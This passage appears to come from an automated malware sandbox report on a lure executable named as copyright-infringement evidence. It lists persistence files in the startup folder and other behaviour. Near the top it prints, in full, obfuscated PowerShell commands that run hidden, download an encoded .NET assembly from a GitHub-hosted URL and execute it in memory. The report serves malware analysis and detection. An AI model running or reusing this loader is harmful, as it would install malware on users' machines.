nACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17A2F54 pushfq ; iretd 0_2_00007FF7A17A2F59
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FF83B8E00BD pushad ; iretd 29_2_00007FF83B8E00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FF83B8C00BD pushad ; iretd 30_2_00007FF83B8C00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FF83B8F00BD pushad ; iretd 31_2_00007FF83B8F00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FF83B8F19D8 pushad ; ret 31_2_00007FF83B8F19E1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FF83B8E00BD pushad ; iretd 33_2_00007FF83B8E00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FF83B8B00BD pushad ; iretd 35_2_00007FF83B8B00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FF83B8B7AD0 pushad ; ret 35_2_00007FF83B8B7AD9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FF83B8B00BD pushad ; iretd 36_2_00007FF83B8B00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 43_2_00007FF83B8C00BD pushad ; iretd 43_2_00007FF83B8C00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 43_2_00007FF83B8C4AF2 push eax; retf 43_2_00007FF83B8C4B09
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF83B8E00BD pushad ; iretd 45_2_00007FF83B8E00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF83B8E2AE2 pushad ; iretd 45_2_00007FF83B8E2AE1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF83B8E2A25 pushad ; iretd 45_2_00007FF83B8E2AE1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF83B8E2375 pushad ; retf 45_2_00007FF83B8E2399
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF83B9B4779 push 90000047h; iretd 45_2_00007FF83B9B47B9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF83B8B00BD pushad ; iretd 53_2_00007FF83B8B00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF83B9836ED pushad ; retf 53_2_00007FF83B983772

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.batJump to dropped file
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.batJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.jsJump to dropped file
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.batJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.batJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.batJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
